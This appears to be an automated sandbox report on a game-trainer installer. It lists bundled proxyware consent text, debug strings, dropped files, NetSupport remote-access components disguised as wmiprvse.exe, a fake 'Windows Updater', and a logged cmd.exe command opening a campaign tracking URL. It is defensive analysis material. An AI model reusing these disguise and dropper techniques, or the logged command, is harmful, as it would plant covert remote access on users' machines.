"Accept" I agree to the HYPERLINK "https://legal.opera.com/eula/computers/"EULA HYPERLINK "https://legal.opera.com/privacy/"Privacy Policy and consent to install.- Build a better digital experience with data-driven resultsLet us help your business optimize its performance perform more efficiently and maximize profit to make more strategically-guided decisions. By clicking "Accept" I agree to the HYPERLINK "https://staranalytics.io/EULA.html"EULA and consent to install.proceeding with the installation you agree to the HYPERLINK "https://digitalpulsedata.com/tos"EULA grant Digital Pulse permission to occasionally utilize the available resources of your device and IP address to retrieve public web data from the Internet. Digital Pulse highly regards your trust and prioritizes safeguarding your privacy and personal data. To ensure your safety Digital Pulse comprehends the security implications involved in sharing your IP address and diligently monitors all network traffic. Your IP address will solely be used for authorized business purposes and never for unauthorized ones. Rest assured that none of your personal information will be accessed or collected except for your IP address. This is a strict policy.I &accept the agreementI &do not accept the agreement&NextCancel
                                  Source: ZmWSzgevgt.exeStatic file information: File size 1671954 > 1048576
                                  Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\ProgramData\regid.1993-06.com.microsoft\msvcr100.dllJump to behavior
                                  Source: ZmWSzgevgt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: wininet.pdb source: a1.exe, 00000014.00000003.2353431592.0000000005933000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2567783357.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, shi4D3B.tmp.33.dr
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: v113.exe, 00000020.00000003.2558249286.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: v113.exe, 00000020.00000003.2558249286.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1402\1402\client32\release_unicode\client32.pdb source: wmiprvse.exe, 0000000E.00000002.4543369015.0000000000402000.00000002.00000001.01000000.00000011.sdmp, wmiprvse.exe, 0000000E.00000000.2226521290.0000000000402000.00000002.00000001.01000000.00000011.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\Prereq.pdbo source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\AICustAct.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, MSIF8B5.tmp.20.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbh source: v113.exe, 00000020.00000000.2555915607.00000000005A8000.00000002.00000001.01000000.00000022.sdmp, v113.exe, 00000020.00000002.2749711024.00000000005A8000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb: source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: v113.exe, 00000020.00000000.2555915607.00000000005A8000.00000002.00000001.01000000.00000022.sdmp, v113.exe, 00000020.00000002.2749711024.00000000005A8000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: msvcr100.i386.pdb source: wmiprvse.exe, 0000000E.00000002.4557171856.000000006F821000.00000020.00000001.01000000.00000015.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\Prereq.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\SoftwareDetector.pdbb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr
                                  Source: Binary string: D:\ReleaseJob\win\Release\bin\x86\embeddeduiproxy.pdb source: a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\lzmaextractor.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\SoftwareDetector.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: wmiprvse.exe, 0000000E.00000002.4558342201.000000006F902000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\Decoder.pdb5 source: a1.exe, 00000014.00000003.2300556158.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: wininet.pdbUGP source: a1.exe, 00000014.00000003.2353431592.0000000005933000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2567783357.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, shi4D3B.tmp.33.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: wmiprvse.exe, 0000000E.00000002.4556884096.000000006BF4E000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: E:\jenkins\workspace\ktop-agent_release_PDFY23FEB_1.0\target\Windows\x64\bin\Release\Setup\ODISSDK.pdb source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.dr
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\DataUploader.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, MSI232D.tmp.21.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\DataUploader.pdb] source: a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, MSI232D.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\Decoder.pdb source: a1.exe, 00000014.00000003.2300556158.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\ShortcutFlags.pdb> source: MSICDCA.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\ShortcutFlags.pdb source: MSICDCA.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\ExternalUi.pdb source: a1.exe, 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmp, a1.exe, 00000014.00000000.2293954187.00000000003CC000.00000002.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\Updater.pdb source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000000.2464786047.000000000010F000.00000002.00000001.01000000.0000001F.sdmp, Windows Updater.exe, 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmp, Windows Updater.exe, 0000001F.00000000.2490617137.000000000059F000.00000002.00000001.01000000.00000021.sdmp, Windows Updater.exe, 0000001F.00000002.2920934218.000000000059F000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\InstallerAnalytics.pdbz source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: wmiprvse.exe, 0000000E.00000002.4556884096.000000006BF4E000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\aischeduler2.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, MSI80A8.tmp.21.dr, MSI80A7.tmp.21.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: wmiprvse.exe, 0000000E.00000002.4557866506.000000006F8E5000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: E:\jenkins\workspace\ktop-agent_release_PDFY23FEB_1.0\target\Windows\x64\bin\Release\Setup\ODISSDK.pdb~ source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: setup.tmp, 00000004.00000002.4557123919.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4559208924.000000001002F000.00000002.00000001.01000000.00000009.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\InstallerAnalytics.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Updater.pdb source: v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp

                                  Data Obfuscation

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x03^&pb=1^&px=2598
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x03^&pb=1^&px=2598Jump to behavior
                                  Source: shiF808.tmp.20.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F42C0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_002F42C0
                                  Source: ZmWSzgevgt.exeStatic PE information: section name: .didata
                                  Source: ZmWSzgevgt.tmp.0.drStatic PE information: section name: .didata
                                  Source: is-74O1B.tmp.1.drStatic PE information: section name: .didata
                                  Source: is-04ME8.tmp.1.drStatic PE information: section name: .didata
                                  Source: setup.tmp.3.drStatic PE information: section name: .didata
                                  Source: a0.exe.4.drStatic PE information: section name: .didata
                                  Source: a0.tmp.5.drStatic PE information: section name: .didata
                                  Source: is-1L53Q.tmp.7.drStatic PE information: section name: .didata
                                  Source: is-9GOQR.tmp.7.drStatic PE information: section name: .00cfg
                                  Source: is-9GOQR.tmp.7.drStatic PE information: section name: _RDATA
                                  Source: 51ccd7e4634de4468d3b8ec370ae3220.tmp.10.drStatic PE information: section name: .hhshare
                                  Source: shiF808.tmp.20.drStatic PE information: section name: .wpp_sf
                                  Source: shiF808.tmp.20.drStatic PE information: section name: .didat
                                  Source: AdvancedWindowsManager.exe.21.drStatic PE information: section name: .xdata
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001B0B9 push ecx; ret 4_2_1001B0CC
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10017775 push ecx; ret 4_2_10017788
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043B5D26 push edi; retf 20_3_043B5D39
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_3_043AEC94 push ecx; retf 20_3_043AECC3
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CA5A0 push ecx; mov dword ptr [esp], ecx20_2_001CA5A1
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00297850 push ecx; mov dword ptr [esp], 3F800000h20_2_00297986
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00349E4E push ecx; ret 20_2_00349E61
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A525BB6 push FFFFFFE8h; ret 20_2_6A525BB9
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A56D80C push ecx; ret 20_2_6A56D81F
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A5266B6 push FFFFFFE8h; ret 20_2_6A5266B9
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000D870C push ecx; ret 28_2_000D871F
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0056870C push ecx; ret 31_2_0056871F
                                  Source: initial sampleStatic PE information: section name: .text entropy: 6.909044922675825
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-92M1P.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA3C5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F30.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpFile created: C:\Program Files (x86)\river-city-rival-showdown-trainer-15-v1-8-.exe\is-74O1B.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi5EB1.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID28A.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8687.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi13CD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1239.tmpJump to dropped file
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeFile created: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi135F.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\MSI4C62.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\is-04ME8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI832A.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI10B0.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi4DAA.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11F9.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi74BC.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\cd2f845e419388478df81bc59730a20b.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5C73.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CC8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6DC5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8057.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F32.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\_isetup\_iscrypt.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\idp.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF8B5.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shiFA87.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI234D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-KD7U9.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICEC6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1336.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFD6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E53.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICE09.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6EA3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB85.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E63.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA5ED.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC6E7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1259.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\5d7fc0667d8a0e48a42ebd70bdd0c76a.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\MSI4CE0.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD1D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FB9.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi743E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC7F2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE2F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC97E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile created: C:\Users\user\AppData\Local\Temp\shiF808.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB0CD.tmpJump to dropped file
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeFile created: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile created: C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: 680b04.rbf (copy)Jump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5C43.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFB6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA521.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFF7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FF9.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A82.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF77.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC50.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC94E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI731E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI208C.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-9GOQR.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI232D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC627.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CE8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC6C6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6ED3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7F4A.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-J9JTN.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6D86.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F72.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI735E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC676.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6929.tmpJump to dropped file
